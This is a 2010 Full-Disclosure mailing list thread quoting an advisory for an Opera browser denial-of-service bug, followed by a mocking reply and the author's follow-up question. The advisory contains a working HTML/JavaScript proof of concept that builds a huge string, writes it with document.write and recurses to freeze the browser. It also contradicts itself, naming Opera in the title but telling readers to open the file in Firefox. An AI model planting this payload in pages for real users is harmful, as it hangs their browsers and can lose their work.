Date: Wed, 3 Mar 2010 01:35:30 -0800
From: information security <informationhacker08@...il.com>
To: Jeff Williams <jeffwillis30@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera (plenitude String )Denial of Service Exploit

Thanks, Jeff, for all your comments.
So how to fix that?

On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@...il.com> wrote:

> You gotta be joking, this is probably the 3000th DoS "advisory" for
> document.write.
>
> Guess what sparky, even Jeremy Brown didn't post that one.
>
> Thus no surprise exploit-db posts this kind of shit.
>
>
> 2010/3/3 information security <informationhacker08@...il.com>
>
>> ======================================================================
>>
>>
>>                       Opera (plenitude String )Denial of Service Exploit
>>                      =======================================================================
>>
>>
>>                                                      by
>>
>>                                             Asheesh Kumar Mani Tripathi
>>
>>
>> # code by Asheesh kumar Mani Tripathi
>>
>> # email informationhacker08@...il.com
>>
>>
>> # company       www.aksitservices.co.in
>>
>> # Credit by Asheesh Anaconda
>>
>>
>> #Download http://www.opera.com/download/
>>
>>
>>
>> #Background
>>
>> Opera is a popular internet browser :)
>>
>> #Vulnerability
>> This bug is a typical result when an attacker tries to write a plenitude String in
>> the document.write() function. User interaction is required to
>> exploit this vulnerability in that the target must visit a malicious
>> web page.
>>
>>
>>
>> #Impact
>> Browser doesn't respond any longer to any user input, all tabs are no
>> longer accessible, your work, if any, might be lost.
>>
>>
>>
>>
>> #Proof of concept
>> Copy the code into a text file, save it as "asheesh.html", and open it in Mozilla Firefox
>>
>> ========================================================================================================================
>>
>>
>>                                                            asheesh.html
>> ========================================================================================================================
>>
>> <html>
>>
>>
>> <title>asheesh kumar mani tripathi</title>
>> Asheesh kumar Mani Tripathi
>> <head>
>>
>> <script>
>> function asheesh()
>> {
>> 	var i, anaconda = "XXXX";
>> 	for (i = 24; i > 0; --i)
>> 	{
>> 		anaconda = anaconda + anaconda;
>> 	}
>> 	document.write(anaconda);
>> 	asheesh();
>> }
>> asheesh();
>> </script>
>> </head>
>>
>> <body onLoad="asheesh()"></body>
>>
>>
>> </html>
>>
>>
>>
>> ========================================================================================================================
>> Why do you worry without cause? Whom do you fear without reason? Who can kill you?
>>
>>
>> The soul is neither born, nor does it die.
>>
>>
>> #If you have any questions, comments, or concerns, feel free to contact me.
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
